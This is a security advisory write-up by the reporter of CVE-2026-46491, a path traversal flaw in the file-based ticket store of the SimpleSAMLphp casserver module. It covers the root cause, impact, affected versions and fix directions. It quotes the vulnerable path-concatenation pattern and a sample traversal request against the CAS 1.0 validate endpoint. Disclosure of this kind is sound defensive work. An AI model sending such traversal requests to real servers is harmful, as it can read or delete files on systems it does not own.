CVE-2026-46491: Path traversal in SimpleSAMLphp casserver FileSystemTicketStore
I reported a path traversal vulnerability in simplesamlphp-module-casserver that was published as CVE-2026-46491 / GHSA-jrrg-99xh-5j2q.
The issue affects deployments that use the file-based CAS ticket store. In that configuration, attacker-controlled CAS ticket identifiers were used as raw filesystem path components. This made it possible for a remote attacker to escape the configured ticket directory through public CAS validation inputs.
Advisory
- CVE:
CVE-2026-46491 - GitHub Advisory:
GHSA-jrrg-99xh-5j2q - Package:
simplesamlphp-module-casserver - Affected versions:
<= 7.0.2 - Patched version:
7.0.3 - Severity: High 8.6/10
- CVSS:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L - CWE:
CWE-22: Improper Limitation of a Pathname to a Restricted Directory
Root Cause
The vulnerable ticket store built paths by concatenating the configured ticket directory and the ticket identifier supplied by the CAS request.
Conceptually, the vulnerable pattern looked like this:
1
$filename = $ticketDirectory . '/' . $ticketId;
That is dangerous when $ticketId comes from a public request parameter. A ticket value containing traversal segments, for example ../target.serialized, can resolve outside the intended ticket directory.
The file-backed store used the constructed path in both read and delete operations:
getTicket($ticketId)read the constructed file path and unserialized the content.deleteTicket($ticketId)unlinked the same constructed path.
Because public CAS validation and proxy endpoints pass attacker-controlled ticket or pgt values into this store, the bug was reachable without SimpleSAMLphp administrator access.
Why CAS 1.0 Was Important
The strongest demonstrated impact was in the CAS 1.0 validation flow.
In that flow, the ticket is first loaded from the ticket store, and then the same ticket identifier is passed to deleteTicket() before the complete semantic validation of the ticket is finished.
That matters because a traversal ticket ID can point at a file outside the ticket cache. If that target file is readable by the PHP process and its content unserializes into a value compatible with the expected nullable array return type, the code can reach the delete operation.
A public request shape for the relevant CAS 1.0 path is:
1
GET /cas/validate?ticket=..%2Ftarget.serialized&service=https%3A%2F%2Fservice.example.org
The deletion impact is conditional. It depends on the PHP process filesystem permissions and on the target file containing serialized data that can be handled by the ticket flow. The report did not claim arbitrary file deletion in every deployment.
Impact
In affected deployments, a remote attacker can make the CAS server access files outside the configured file-ticket directory.
The confirmed impact was:
- out-of-ticket-directory read and
unserialize()of files containing serialized PHP data; - conditional deletion of attacker-selected files through the CAS 1.0 validation path;
- destruction of CAS ticket files or other serialized SimpleSAMLphp runtime/cache files when filesystem permissions and file contents allow it.
The unserialize() call is also a dangerous secondary primitive if an attacker has another way to place a serialized object file at a reachable path. I did not claim a complete PHP object injection or RCE chain for this advisory.
Fix Direction
The fix should ensure that ticket identifiers are never used as raw filesystem paths.
Defensive patterns include:
- reject ticket IDs containing path separators, dot-dot segments, NUL bytes, or values outside the expected CAS ticket format;
- derive filesystem names from a safe encoding or hash of the ticket ID;
- canonicalize resolved paths and enforce that they remain under the configured ticket directory;
- use safer unserialization options where possible, for example disallowing classes;
- only delete files that have already been proven to be valid in-directory ticket files.
References
- GitHub Advisory: https://github.com/simplesamlphp/simplesamlphp-module-casserver/security/advisories/GHSA-jrrg-99xh-5j2q
- SimpleSAMLphp casserver module: https://github.com/simplesamlphp/simplesamlphp-module-casserver